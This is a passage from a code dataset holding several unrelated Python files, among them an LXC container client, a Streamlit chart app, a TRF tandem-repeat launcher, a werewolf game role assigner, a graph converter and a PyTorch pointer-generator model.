str(response.Seguimiento.Abonado[0].SeguimientoAbonado.Seguimiento[0].PersonaEntrega)\n # numAlbaranMrw = str(response.Seguimiento.Abonado[0].SeguimientoAbonado.Seguimiento[0].NumAlbaran)\n\n # if fechaEntregaMrw == \"None\":\n # cx[\"cur\"].execute(\"UPDATE idl_ecommerce SET entregadomrw = false, estadoentregamrw = '\" + estadoEntregaMrw + \"', descestadoentregamrw = '\" + descEstadoentregaMrw + \"', intentosentregamrw = '\" + intentosentregaMrw + \"', personaentregamrw = '\" + personaEntregaMrw + \"', numalbaranmrw = '\" + numAlbaranMrw + \"' WHERE id = \" + str(idEcommerce))\n # else:\n # entregadoMrw = \"FALSE\"\n # fechaEntregaMrw = fechaEntregaMrw[4:8] + \"-\" + fechaEntregaMrw[2:4] + \"-\" + fechaEntregaMrw[0:2]\n # horaEntregaMrw = horaEntregaMrw[0:2] + \":\" + horaEntregaMrw[2:4]\n # if estadoEntregaMrw == \"00\":\n # entregadoMrw = \"TRUE\"\n\n # cx[\"cur\"].execute(\"UPDATE idl_ecommerce SET entregadomrw = \" + entregadoMrw + \", estadoentregamrw = '\" + estadoEntregaMrw + \"', descestadoentregamrw = '\" + descEstadoentregaMrw + \"', fechaentregamrw = '\" + fechaEntregaMrw + \"', horaentregamrw = '\" + horaEntregaMrw + \"', intentosentregamrw = '\" + intentosentregaMrw + \"', personaentregamrw = '\" + personaEntregaMrw + \"', numalbaranmrw = '\" + numAlbaranMrw + \"' WHERE id = \" + str(idEcommerce))\n\n # cx[\"conn\"].commit()\n # else:\n # cx[\"cur\"].execute(\"UPDATE idl_ecommerce SET descestadoentregamrw = 'No hay seguimiento' WHERE id = \" + str(idEcommerce))\n # cx[\"conn\"].commit()\n # else:\n # cx[\"cur\"].execute(\"UPDATE idl_ecommerce SET descestadoentregamrw = 'No encontrado' WHERE id = \" + str(idEcommerce))\n # cx[\"conn\"].commit()\n\n except Exception as e:\n print(e)\n\n cx[\"cur\"].execute(\"DELETE FROM eg_fichprocesados WHERE tipo = 'MRW_ESTADOS'\")\n cx[\"conn\"].commit()\n cierraConexion(cx)\n\n return True\n","sub_path":"peticionesidl/enviarArticulosAmazon.py","file_name":"enviarArticulosAmazon.py","file_ext":"py","file_size_in_byte":4466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"410614591","text":"from oslo.config import cfg\nfrom wormhole.i18n import _\nfrom wormhole.common import log\nfrom wormhole.common import utils\nfrom wormhole.common import excutils\nfrom wormhole import exception\nfrom wormhole.net_util import network\n\nimport os\nimport stat\n\nlxc_opts = [\n cfg.StrOpt('vif_driver',\n default='wormhole.net_util.vifs.GenericVIFDriver'),\n cfg.BoolOpt('insecure_registry',\n default=False,\n help='Set true if need insecure registry access.'),\n]\n\nCONF = cfg.CONF\nCONF.register_opts(lxc_opts, 'lxc')\n\nLOG = log.getLogger(__name__)\nLXC_MOUNT_DIR = '/lxc/'\nLXC_PATH = '/var/lib/lxc'\nLXC_TEMPLATE_SCRIPT = '/var/lib/wormhole/bin/lxc-general'\n\nLXC_NET_CONFIG_TEMPLATE = \"\"\"# new network\nlxc.network.type = veth\nlxc.network.link = %(bridge)s\nlxc.network.veth.pair = %(tap)s\nlxc.network.name = %(name)s\nlxc.network.flags = up\nlxc.network.hwaddr = %(address)s\nlxc.network.mtu = %(mtu)s\n\"\"\"\n\ndef lxc_root(name):\n return LXC_PATH + \"/\" + name + \"/\"\n\ndef lxc_conf_dir(name):\n return lxc_root(name) + \"conf.d/\"\n\ndef lxc_hook_dir(name):\n return lxc_root(name) + \"hooks/\"\n\ndef lxc_device_conf_file(name, device):\n device_name = os.path.basename(device)\n return lxc_conf_dir(name) + \"dev_\" + device_name + \".conf\"\n\ndef lxc_net_conf_file(name, vif=\"all\"):\n return lxc_conf_dir(name) + \"net_\" + vif + \".conf\"\n\ndef lxc_autodev_hook_script(name, device):\n device_name = os.path.basename(device)\n return lxc_hook_dir(name) + \"autodev_\" + device_name + \".sh\"\n\ndef lxc_net_conf(name, net_name, vif):\n\n conf = \"## START %s\\n\"%vif['id'][:11]\n conf += LXC_NET_CONFIG_TEMPLATE % {\n \"bridge\": \"qbr%s\"%vif['id'][:11],\n \"tap\": \"tap%s\"%vif['id'][:11],\n \"name\": net_name,\n \"mtu\": str(vif.get('mtu',1300)),\n \"address\": vif['address']\n }\n gateway = network.find_gateway(name, vif['network'])\n ip = network.find_fixed_ip(name, vif['network'])\n if net_name == \"eth0\":\n if ip: conf += \"lxc.network.ipv4 = %s\\n\" % ip\n if gateway: conf += \"lxc.network.ipv4.gateway = %s\\n\" % gateway\n conf += \"## END\\n\\n\"\n return conf\n\n\nclass LXCClient(object):\n def __init__(self):\n pass\n\n def execute(self, container_id, *cmd):\n out, _err = utils.execute('lxc-attach', '-n', container_id, '--', *cmd, attempts=1)\n return out\n\n def list(self, all=True):\n containers, _err = utils.execute('lxc-ls', '-f', '-F', 'NAME,STATE')\n if containers:\n # skip the header\n containers = filter(str.strip, containers.split('\\n')[1:])\n return [{'id': name, 'status': state, 'name':name}\n for name, state in map(str.split, containers)]\n return []\n\n def inspect_container(self, container_id):\n # need to return the container process pid\n # rsp structure rsp['State']['Pid'] = pid\n info, _err = utils.execute('lxc-info', '-p', '-n', container_id)\n return {'State': {'Pid': info.split()[-1]}} if info else {}\n\n def create_container(self, name, network_disabled=False):\n try:\n utils.execute('lxc-create', '-n', name, '-t', LXC_TEMPLATE_SCRIPT)\n except Exception as ex:\n with excutils.save_and_reraise_exception():\n LOG.error(_('Faild to start container '\n '%(name)s: %(ex)s'),\n {'name': name, 'ex': ex.message})\n self.destroy(name, network_info)\n\n\n def destroy(self, name, network_info):\n \"\"\"Destroy the instance on the LXD host\n\n \"\"\"\n try:\n utils.execute('lxc-destroy', '-f', '-n', name)\n LOG.info('Destroyed for %s' %name)\n except Exception as ex:\n with excutils.save_and_reraise_exception():\n LOG.error(_('Failed to remove container'\n ' for %(name)s: %(ex)s'),\n {'name': name, 'ex': ex.message})\n\n def images(self, name=None):\n return True\n\n def pull(self, repository, tag=None, insecure_registry=True):\n pass\n\n def stop(self, name, timeout):\n containers = self.list()\n status = [c['status'] for c in containers if c['name'] == name]or ['']\n if status and status[0] != 'RUNNING':\n return \"Container {} is {}, can't stop it\".format(name, status[0])\n try:\n utils.execute('lxc-stop', '-n', name, '-t', timeout)\n except Exception as ex:\n with excutils.save_and_reraise_exception():\n LOG.error(_('Failed to stop container'\n ' for %(name)s: %(ex)s'),\n {'name': name, 'ex': ex.message})\n\n def pause(self, name):\n try:\n utils.execute('lxc-freeze', '-n', name)\n except Exception as ex:\n with excutils.save_and_reraise_exception():\n LOG.error(_('Failed to pause container for %(name)s: %(ex)s'),\n {'name': name, 'ex': ex.message})\n\n def unpause(self, name):\n try:\n utils.execute('lxc-unfreeze', '-n', name)\n except Exception as ex:\n with excutils.save_and_reraise_exception():\n LOG.error(_('Failed to unpause container for %(name)s: %(ex)s'),\n {'name': name, 'ex': ex.message})\n\n def inject_file(self, name, path, content):\n\n if os.path.isdir(LXC_MOUNT_DIR + os.path.dirname(path)):\n with open(LXC_MOUNT_DIR + path, 'w') as f: f.write(content)\n else:\n raise exception.DirNotFound(dir=os.path.dirname(path))\n\n def read_file(self, name, path):\n with open(LXC_MOUNT_DIR + path, 'r') as f: return f.read()\n\n def _dynamic_attach_or_detach_volume(self, name, device, maj, min, attach=True):\n\n action = 'add' if attach else 'del'\n\n utils.execute('lxc-device', '-n', name, action, device)\n\n cgroup_device_allow = '/sys/fs/cgroup/devices/lxc/%s/devices.%s' \\\n %(name, 'allow' if attach else 'deny')\n for i in range(1, 16):\n with open(cgroup_device_allow, 'w') as f:\n f.write('b %(maj)s:%(min)s rwm\\n'%{'maj':maj, 'min':min+i})\n\n def attach_volume(self, name, device, mount_device, static=True):\n try:\n s = os.stat(device)\n if not stat.S_ISBLK(s.st_mode):\n raise exception.InvalidInput(reason='\"%s\" is not block device'%device)\n maj, min = os.major(s.st_rdev), os.minor(s.st_rdev)\n if not static:\n # ignore mount_device now\n self._dynamic_attach_or_detach_volume(name, device, maj, min, attach=True)\n else:\n conf_path = lxc_device_conf_file(name, device)\n with open(conf_path, 'w') as f:\n for i in range(16):\n f.write('lxc.cgroup.devices.allow = '\n 'b %(maj)s:%(min)s rwm\\n'%{'maj':maj, 'min':min+i})\n\n LOG.info(_(\"new config path %(path)s for %(device)s\"),\n {'path': conf_path, 'device': device})\n # autodev hook:\n # add the partitions of this device into the container when it starts\n with open(lxc_autodev_hook_script(name, device), 'w') as f, \\\n open('/proc/partitions', 'r') as p:\n for line in p:\n fields = line.split()\n if fields and fields[-1].startswith(os.path.basename(device)):\n f.write(\"mknod --mode=0660 $LXC_ROOTFS_MOUNT/dev/%(device)s \"\n \"b %(maj)s %(min)s\\n\" % {\n \"device\": fields[-1], \"maj\":fields[0], \"min\":fields[1]})\n\n\n except Exception as ex:\n with excutils.save_and_reraise_exception():\n LOG.error(_('Failed to attach device %(device)s '\n ' for %(name)s: %(ex)s'),\n {'name': name, 'ex': ex.message, 'device': device})\n\n def detach_volume(self, name, device, mount_device, static=True):\n try:\n s = os.stat(device)\n if not stat.S_ISBLK(s.st_mode):\n raise exception.InvalidInput(reason='\"%s\" is not block device'%device)\n maj, min = os.major(s.st_rdev), os.minor(s.st_rdev)\n if not static:\n self._dynamic_attach_or_detach_volume(name, device, maj, min, attach=False)\n for cb in [lxc_device_conf_file, lxc_autodev_hook_script]:\n path = cb(name, device)\n if path and os.isfile(path):\n os.remove(path)\n LOG.info(_(\"delete path %(path)s for %(device)s\"),\n {'path': path, 'device': device})\n except Exception as ex:\n with excutils.save_and_reraise_exception():\n LOG.error(_('Failed to detach device %(device)s '\n ' for %(name)s: %(ex)s'),\n {'name': name, 'ex': ex.message, 'device': device})\n\n def remove_interfaces(self, name, network_info):\n for vif in network_info:\n if_local_name = 'tap%s' % vif['id'][:11]\n utils.trycmd('ip', 'link', 'del', if_local_name, run_as_root=True)\n _file = lxc_net_conf_file(name, vif['id'][:11])\n LOG.debug(\"remove net conf %s\\n\", vif['id'][:11])\n if os.path.isfile(_file):\n os.remove(_file)\n\n def add_interfaces(self, name, network_info, append=True, net_names=[]):\n network_info = network_info or []\n if not append:\n _dir = lxc_conf_dir(name)\n for _f in os.listdir(_dir):\n if _f.startswith('net_') and _f.endswith('.conf'):\n _f = _dir + \"/\" + _f\n os.remove(_f)\n LOG.debug(\"remove file %s\", _f)\n\n if not net_names:\n net_names = [\"eth%d\"%i for i in range(len(network_info))]\n for net_name, vif in zip(net_names, network_info):\n conf = lxc_net_conf(name, net_name, vif)\n LOG.debug(\"new net conf %s, content: %s\\n\", vif['id'][:11], conf)\n with open(lxc_net_conf_file(name, vif['id'][:11]), \"w\") as f:\n f.write(conf)\n\n def start(self, name, network_info=None, block_device_info=None, timeout=10):\n # Start the container\n try:\n self.add_interfaces(name, network_info, append=False)\n utils.execute('lxc-start', '-n', name, '-d', '-l', 'DEBUG')\n utils.execute('lxc-wait', '-n', name, '-s', 'RUNNING', '-t', timeout)\n except Exception as ex:\n with excutils.save_and_reraise_exception():\n LOG.error(_('Failed to start container'\n ' for %(name)s: %(ex)s'),\n {'name': name, 'ex': ex.message})\n","sub_path":"wormhole/lxc_client.py","file_name":"lxc_client.py","file_ext":"py","file_size_in_byte":11030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"621679549","text":"import pydeck as pdk\nimport datetime\nimport math\nimport altair as alt\nfrom altair import Chart, X, Y, Axis, SortField, OpacityValue\nimport plotly.figure_factory as ff\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\nimport time\nimport streamlit as st\n\n#READ CSV FILE AND TEST STREAMLIT DEVELOPMENT IN THIS FILE.\ndef load_data(nrows):\n data = pd.read_csv('sweetpea.csv')\n return data\ndata = load_data(10000)\nprint(data)\n\ndata['date_time'] = pd.to_datetime(data['date_time']) # this creates an odd time stamp in streamlit. Not required.\n\nst.title('Sweet Pea Movements')\nst.image('./Sweet_Pea.jpg', caption='Feeling those wiggles')\n\nst.subheader('Record wiggles here https://forms.gle/xW1HJuyCyQ4bywFU7')\n\nst.subheader('View all wiggles')\nst.write(data)\nst.altair_chart(alt.Chart(data)\n\t\t\t\t.mark_rect()\n\t\t\t\t.encode(\n\talt.X('hours(date_time):O', title='hour'),\n\talt.Y('monthdate(date_time):O', title='day'),\n\tcolor='count(data):Q',\n\ttooltip=[\n\t\talt.Tooltip('hours(date_time):O', title='hour'),\n\t\talt.Tooltip('count(data):Q', title='Wiggle count')\n\t]\n).properties(\n\ttitle='All the wiggles'\n))\n\n\nst.title(\"Wiggles by hour\")\nhour_selected = st.slider(\"Select hour of wiggles\", 0, 23)\n\n# FILTERING DATA BY HOUR SELECTED\ndata = data[data['date_time'].dt.hour == hour_selected]\n\n# FILTERING DATA FOR THE HISTORGRAM\n\nfiltered = data[\n\t(data['date_time'].dt.hour >= hour_selected) & (data['date_time'].dt.hour < (hour_selected + 1))\n\t]\n\nhist = np.histogram(filtered['date_time'].dt.minute, bins=60, range=(0, 60))[0]\nchart_data = pd.DataFrame({\"minute\": range(60), \"movement\": hist})\n\n#LAYING OUT THE HISTOGRAM SECTIONs\n\nst.write(\"\")\nst.write(\"**Wiggles per minute between %i:00 and %i:00**\" % (hour_selected, (hour_selected + 1) % 24))\n\nst.altair_chart(alt.Chart(chart_data)\n\t.mark_area(\n\t\tinterpolate='step-after',\n\t).encode(\n\t\tx=alt.X(\"minute:Q\", scale=alt.Scale(nice=False)),\n\t\ty=alt.Y(\"movement:Q\"),\n\t\ttooltip=['minute', 'movement']\n\t).configure_mark(\n\t\topacity=0.5,\n\t\tcolor='blue'\n\t), use_container_width=True)\n\n\n\n\n\nst.line_chart(data)\nst.write(data)\n\n","sub_path":"milkbar_streamlit_csv.py","file_name":"milkbar_streamlit_csv.py","file_ext":"py","file_size_in_byte":2074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"176851855","text":"#!/usr/bin/env python\n\n# Copyright INRA (Institut National de la Recherche Agronomique)\n# http://www.inra.fr\n# http://urgi.versailles.inra.fr\n#\n# This software is governed by the CeCILL license under French law and\n# abiding by the rules of distribution of free software. You can use,\n# modify and/ or redistribute the software under the terms of the CeCILL\n# license as circulated by CEA, CNRS and INRIA at the following URL\n# \"http://www.cecill.info\".\n#\n# As a counterpart to the access to the source code and rights to copy,\n# modify and redistribute granted by the license, users are provided only\n# with a limited warranty and the software's author, the holder of the\n# economic rights, and the successive licensors have only limited\n# liability.\n#\n# In this respect, the user's attention is drawn to the risks associated\n# with loading, using, modifying and/or developing or reproducing the\n# software by the user in light of its specific status of free software,\n# that may mean that it is complicated to manipulate, and that also\n# therefore means that it is reserved for developers and experienced\n# professionals having in-depth computer knowledge. Users are therefore\n# encouraged to load and test the software's suitability as regards their\n# requirements in conditions enabling the security of their systems and/or\n# data to be ensured and, more generally, to use and operate it in the\n# same conditions as regards security.\n#\n# The fact that you are presently reading this means that you have had\n# knowledge of the CeCILL license and that you accept its terms.\n\nimport os\nimport shutil\nimport subprocess\nfrom commons.core.LoggerFactory import LoggerFactory\nfrom commons.core.checker.CheckerUtils import CheckerUtils\nfrom commons.core.checker.RepetException import RepetException\nfrom commons.core.utils.FileUtils import FileUtils\nfrom commons.core.utils.RepetOptionParser import RepetOptionParser\n\nLOG_DEPTH = \"commons.launcher\"\n\n##Launch TRF\n#\nclass LaunchTRF(object):\n\n def __init__(self, inFileName = \"\", outFileName = \"\", maxPeriod = 15, doClean = False, verbosity = 3):\n self._inFileName = inFileName\n self.setOutFileName(outFileName)\n self._outMaskedFileName = \"\"\n self._mismatch = 3\n self._indelPenalty = 5\n self._minScore = 20\n self._maxPeriod = maxPeriod\n\n self._doClean = doClean\n self._verbosity = verbosity\n self._log = LoggerFactory.createLogger(\"%s.%s\" % (LOG_DEPTH, self.__class__.__name__), self._verbosity)\n\n def setAttributesFromCmdLine(self):\n usage = \"LaunchTRF.py [options]\"\n description = \"Launch TRF to detect micro-satellites in sequences.\\n\"\n epilog = \"\\nExample: launch with a maximum period size of 10, keep temporary files and display only warnings.\\n\"\n epilog += \"\\t$ LaunchTRF.py -i genome.fa -m 10 -v 2\\n\"\n parser = RepetOptionParser(description = description, epilog = epilog, usage = usage)\n parser.add_option(\"-i\", \"--in\", dest = \"inFileName\", action = \"store\", type = \"string\", help = \"input file name [compulsory] [format: fasta]\", default = \"\")\n parser.add_option(\"-o\", \"--out\", dest = \"outFileName\", action = \"store\", type = \"string\", help = \"output file name [default: .TRF.set]\", default = \"\")\n parser.add_option(\"--outMaskedFile\", dest = \"outMaskedFile\", action = \"store\", type = \"string\", help = \"output masked FASTA file name [optional] [default: no output]\", default = \"\")\n parser.add_option(\"-M\", \"--mismatch\", dest = \"mismatch\", action = \"store\", type = \"int\", help = \"mismatching penalty [default: 3]\", default = 3)\n parser.add_option(\"-p\", \"--penaltyIn\", dest = \"indelPen\", action = \"store\", type = \"int\", help = \"indel penalty [default: 5]\", default = 5)\n parser.add_option(\"-s\", \"--scoreMin\", dest = \"minScore\", action = \"store\", type = \"int\", help = \"minimum alignment score to report [default: 20]\", default = 20)\n parser.add_option(\"-m\", \"--maxPeriod\", dest = \"maxPeriod\", action = \"store\", type = \"int\", help = \"maximum period size to report [default: 15]\", default = 15)\n parser.add_option(\"-c\", \"--clean\", dest = \"doClean\", action = \"store_true\", help = \"clean temporary files [optional] [default: False]\", default = False)\n parser.add_option(\"-v\", \"--verbosity\", dest = \"verbosity\", action = \"store\", type = \"int\", help = \"verbosity [optional] [default: 3]\", default = 3)\n options = parser.parse_args()[0]\n self._setAttributesFromOptions(options)\n\n def _setAttributesFromOptions(self, options):\n self.setInFileName(options.inFileName)\n self.setOutFileName(options.outFileName)\n self.setMismatch(options.mismatch)\n self.setIndelPenalty(options.indelPen)\n self.setMinScore(options.minScore)\n self.setMaxPeriod(options.maxPeriod)\n self.setOutMaskedFileName(options.outMaskedFile)\n self.setDoClean(options.doClean)\n self.setVerbosity(options.verbosity)\n\n def setInFileName(self, inFileName):\n self._inFileName = inFileName\n\n def setOutFileName(self, outFileName):\n if outFileName == \"\":\n self._outFileName = \"%s.TRF.set\" % self._inFileName\n else:\n self._outFileName = outFileName\n\n def setMismatch(self, mismatch):\n self._mismatch = mismatch\n\n def setIndelPenalty(self, indelPenalty):\n self._indelPenalty = indelPenalty\n\n def setMinScore(self, minScore):\n self._minScore = minScore\n\n def setMaxPeriod(self, maxPeriod):\n self._maxPeriod = maxPeriod\n\n def setOutMaskedFileName(self, outMaskedFile):\n self._outMaskedFileName = outMaskedFile\n\n def setDoClean(self, doClean):\n self._doClean = doClean\n\n def setVerbosity(self, verbosity):\n self._verbosity = verbosity\n\n def _checkOptions(self):\n if self._inFileName == \"\":\n self._logAndRaise(\"Missing input fasta file name\")\n else:\n if not FileUtils.isRessourceExists(self._inFileName):\n self._logAndRaise(\"Input fasta file '%s' does not exist!\" % self._inFileName)\n\n self._log.debug(\"Forcing integer type for maxPeriod, mismatch, penaltyIn and scoreMin parameters\")\n self._maxPeriod = int(self._maxPeriod)\n self._mismatch = int(self._mismatch)\n self._indelPenalty = int(self._indelPenalty)\n self._minScore = int(self._minScore)\n if self._maxPeriod < 1:\n self._logAndRaise(\"maxPeriod ('-m' option) must be a strictly positive integer\")\n if self._mismatch < 0:\n self._logAndRaise(\"mismatch ('-M' option) must be a positive integer\")\n if self._indelPenalty < 0:\n self._logAndRaise(\"penaltyIn ('-p' option) must be a positive integer\")\n if self._minScore < 0:\n self._logAndRaise(\"scoreMin ('-s' option) must be a positive integer\")\n\n def _logAndRaise(self, errorMsg):\n self._log.error(errorMsg)\n raise RepetException(errorMsg)\n\n def _launchTRF(self):\n cmd = \"trf %s 2 %d %d 80 10 %d %d -h -d\" % (self._inFileName, self._mismatch, self._indelPenalty, self._minScore, self._maxPeriod)\n\n if self._outMaskedFileName:\n cmd += \" -m\"\n self._log.debug(\"Running : %s\" % cmd)\n process = subprocess.Popen(cmd.split(' '), stdout = subprocess.PIPE, stderr = subprocess.PIPE)\n output = process.communicate()\n self._log.debug(\"Output:\\n%s\" % output[0])\n\n def _parseTRF(self):\n self._log.debug(\"Parsing TRF output\")\n with open(\"%s.2.%d.%d.80.10.%d.%d.dat\" % (self._inFileName, self._mismatch, self._indelPenalty, self._minScore, self._maxPeriod), 'r') as inFile:\n with open(self._outFileName, 'w') as outFile:\n nbPatterns = 0\n nbInSeq = 0\n for line in inFile:\n data = line.split(\" \")\n if len(data) > 1 and \"Sequence:\" in data[0]:\n nbInSeq += 1\n seqName = data[1][:-1]\n if len(data) >= 14:\n nbPatterns += 1\n consensus = data[13]\n copyNb = int(float(data[3]) + 0.5)\n start = data[0]\n end = data[1]\n outFile.write(\"%i\\t(%s)%i\\t%s\\t%s\\t%s\\n\" % (nbPatterns, consensus, copyNb, seqName, start, end))\n self._log.debug(\"Finished Parsing TRF output\")\n\n def run(self):\n \"\"\"\n Launch TRF to detect micro-satellites in sequences.\n \"\"\"\n LoggerFactory.setLevel(self._log, self._verbosity)\n self._log.info(\"START LaunchTRF\")\n\n if not CheckerUtils.isExecutableInUserPath(\"trf\"):\n self._logAndRaise(\"ERROR: 'trf' must be in your path\")\n self._checkOptions()\n self._log.debug(\"Input file name: %s\" % self._inFileName)\n\n self._launchTRF()\n self._parseTRF()\n\n if self._outMaskedFileName:\n shutil.move(\"%s.2.%d.%d.80.10.%d.%d.mask\" % (self._inFileName, self._mismatch, self._indelPenalty, self._minScore, self._maxPeriod), self._outMaskedFileName)\n\n if self._doClean:\n self._log.warning(\"Temporary files will be cleaned\")\n try:\n os.remove(\"%s.2.%d.%d.80.10.%d.%d.dat\" % (self._inFileName, self._mismatch, self._indelPenalty, self._minScore, self._maxPeriod))\n except:pass\n\n self._log.info(\"END LaunchTRF\")\n\nif __name__ == \"__main__\":\n iLaunchTRF = LaunchTRF()\n iLaunchTRF.setAttributesFromCmdLine()\n iLaunchTRF.run()","sub_path":"commons/launcher/LaunchTRF.py","file_name":"LaunchTRF.py","file_ext":"py","file_size_in_byte":9613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"17190514","text":"#Role Assign\nimport random\nimport character \nimport chat_group \n\nclass Players():\n \n def __init__(self):\n self.gaming_group = []\n self.win_side = ''\n\n def role_assign(self, chat_group):\n #roles for 2 players is just for test\n roles = {3:[\"villager\",\"wolf\",\"wolf\"],\\\n 4:[\"villager\",\"villager\", \"wolf\", \"prophet\"],\\\n 5:['villager', 'villager', 'wolf', 'prophet', 'witch'],\\\n 6:['villager','villager', 'wolf', 'prophet', 'witch', 'wolf'],\\\n 7:['villager','villager', 'wolf','wolf', 'prophet', 'witch', 'villager'],\\\n 8:['villager','villager','villager', 'wolf','wolf', 'prophet', 'witch', 'wolf'],\\\n 9:['villager','villager','villager','villager', 'wolf','wolf','wolf', 'prophet', 'witch', 'villager'],\\\n 10:['villager','villager','villager','villager', 'wolf','wolf','wolf', 'prophet', 'witch', 'wolf']}\n number = len(chat_group)\n game_roles = roles[number]\n print(\"Roles in this round: \", game_roles)\n gaming_groups = []\n for player in chat_group:\n c = character.Character(player)\n random.shuffle(game_roles)\n c.set_role(game_roles.pop())\n gaming_groups.append(c)\n \n return gaming_groups\n \n def get_gaming_group(self, chat_group):\n self.gaming_group = self.role_assign(chat_group)\n return self.gaming_group\n \n def judge_result(self,gaming_group):\n alive = {}\n for player in gaming_group:\n if player.get_status() == 'alive':\n alive[player.playerName] = player.get_role()\n if 'wolf' not in alive.values():\n if 'villager' not in alive.values():\n self.win_side = 'no one wins, both villagers and wolves are dead. \\n'\n self.status = 'gameover'\n return self.win_side\n else:\n self.win_side = 'villager\\n'\n self.status = 'gameover'\n return self.win_side\n elif 'villager' not in alive.values():\n if 'wolf' not in alive.values():\n self.win_side = 'no one wins, both villagers and wolves are dead. \\n'\n self.status = 'gameover'\n return self.win_side\n else:\n self.win_side = 'wolf\\n'\n self.status = 'gameover'\n return self.win_side\n elif 'prophet' not in alive.values() and 'witch' not in alive.values():\n self.win_side = 'wolves\\n'\n self.status = 'gameover'\n return self.win_side\n else:\n return \"continue\"\n \n \n \n \n \n \n\n\n\n\n\n\n \n\n","sub_path":"players.py","file_name":"players.py","file_ext":"py","file_size_in_byte":2774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"335078188","text":"#!/usr/bin/env python3\nimport sys\nimport ast\nimport json\nimport getpass\nimport os\nimport fileinput\nimport re\n\n\ndata = []\n\n\ndef csvToList(csv):\n with open(csv) as f:\n infile = [line for line in f.readlines()]\n for l in infile:\n line = l.split()\n data.append([int(line[0])])\n\n\n#Each line is composed with each adjacent nodes\n#A line correspond to a node\ndef convertToNeighboor(file):\n with open(file) as x, open('input/graphNeighboor.txt', 'w') as outfile:\n infile = [line for line in x.readlines()]\n edges = 0\n nodeList = 0\n for d in data:\n for l in infile:\n line = l.split()\n if d[0] == int(line[0]):\n d.extend([int(line[1]), int(line[2])])\n nodeList += 1\n #Comment to have a directed graph\n elif d[0] == int(line[1]):\n d.extend([int(line[0]), int(line[2])])\n #count number of edges\n edges += 1\n \n output = str(edges) + ' ' + str(nodeList) + ' 1\\n'\n for line in data:\n outputLine = ''\n del(line[0])\n for elem in line:\n outputLine += str(elem) + ' '\n output += outputLine.rstrip() + '\\n'\n outfile.write(output.rstrip())\n\n\ndef main(argv):\n csvToList(argv[2])\n convertToNeighboor(argv[1])\n\n\nif __name__ == \"__main__\":\n sys.exit(main(sys.argv))\n","sub_path":"Converters scripts/graphByNeighboor.py","file_name":"graphByNeighboor.py","file_ext":"py","file_size_in_byte":1461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"212005257","text":"from __future__ import unicode_literals, print_function, division\n\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nimport torch.nn.functional as F\nimport time\nimport random\nimport utils as utils\nimport shutil\n\n\nclass EncoderRNN(nn.Module):\n def __init__(self, vocab_size, hidden_size):\n super(EncoderRNN, self).__init__()\n self.hidden_size = hidden_size\n self.vocab_size = vocab_size\n self.embedding = nn.Embedding(vocab_size, hidden_size, padding_idx=0)\n self.gru = nn.GRU(hidden_size, hidden_size, bidirectional=True, batch_first=True)\n\n def forward(self, input, hidden):\n embedded = self.embedding(input)\n return self.gru(embedded, hidden)\n\n def init_hidden(self, batch_size, use_cuda):\n if use_cuda: return Variable(torch.zeros(2, batch_size, self.hidden_size)).cuda()\n else: return Variable(torch.zeros(2, batch_size, self.hidden_size))\n\n\nclass AttnDecoderRNN(nn.Module):\n def __init__(self, hidden_size, embedding_size, vocab_size, n_layers=1, dropout_p=0.1, embedding_weight=None):\n super(AttnDecoderRNN, self).__init__()\n # Parameters\n self.hidden_size = hidden_size\n self.embedding_size = embedding_size\n self.n_layers = n_layers\n self.dropout_p = dropout_p\n self.vocab_size = vocab_size\n\n self.embedding = nn.Embedding(vocab_size, self.embedding_size)\n self.dropout = nn.Dropout(self.dropout_p)\n self.gru = nn.GRU(input_size=self.embedding_size, hidden_size=self.hidden_size, batch_first=True)\n\n # Attention variables\n self.w_h = nn.Parameter(torch.randn(self.hidden_size))\n self.w_s = nn.Parameter(torch.randn(self.hidden_size))\n self.att_bias = nn.Parameter(torch.randn(1))\n self.attn_weight_v = nn.Parameter(torch.randn(self.hidden_size))\n\n # Generator\n self.gen_layer = nn.Linear(self.hidden_size*2 + self.embedding_size, 1)\n self.out_hidden = nn.Linear(self.hidden_size*2, self.embedding_size)\n self.out_vocab = nn.Linear(self.embedding_size, vocab_size)\n\n # Weight_sharing\n if embedding_weight is not None:\n self.out_vocab.weight = embedding_weight\n\n def forward(self, input_token, last_decoder_hidden, encoder_states, full_input_var, use_cuda):\n\n embedded_input = self.embedding(input_token)\n embedded_input = self.dropout(embedded_input)\n decoder_output, decoder_hidden = self.gru(embedded_input, torch.unsqueeze(last_decoder_hidden, 0))\n\n att_dist = F.tanh((self.w_h * encoder_states) + (self.w_s * decoder_output) + self.att_bias)\n att_dist = (self.attn_weight_v * att_dist).sum(-1)\n att_dist = F.softmax(att_dist, dim=-1)\n\n context_vector = (torch.unsqueeze(att_dist, 2) * encoder_states).sum(1)\n decoder_context = torch.cat((torch.squeeze(decoder_output, 1), context_vector), -1)\n p_vocab = F.softmax(self.out_vocab(self.out_hidden(decoder_context)), dim=-1) # replace with embedding weight\n\n p_gen = F.sigmoid(self.gen_layer(torch.cat((decoder_context, torch.squeeze(embedded_input, 1)), 1)))\n '''\n pointer_dist = att_dist * (1-p_gen)\n padding_matrix = Variable(torch.zeros(batch_size, 250)).cuda()\n generator_dist = torch.cat((p_vocab * p_gen, padding_matrix), 1)\n p_final = generator_dist.scatter_add_(1, full_input_var, pointer_dist)\n\n '''\n token_input_dist = Variable(torch.zeros((full_input_var.size()[0], self.vocab_size+500)))\n padding_matrix_2 = Variable(torch.zeros(full_input_var.size()[0], 500))\n if use_cuda:\n token_input_dist = token_input_dist.cuda()\n padding_matrix_2 = padding_matrix_2.cuda()\n\n token_input_dist.scatter_add_(1, full_input_var, att_dist)\n p_final = torch.cat((p_vocab * p_gen, padding_matrix_2), 1) + (1-p_gen) * token_input_dist\n\n #print((p_final_2 - p_final).sum(-1))\n return decoder_hidden.squeeze(0), p_final, p_gen, p_vocab, att_dist\n #return decoder_hidden.squeeze(0), None, None, p_vocab, att_dist\n\n def init_hidden(self, use_cuda):\n result = Variable(torch.zeros(1, 1, self.hidden_size))\n if 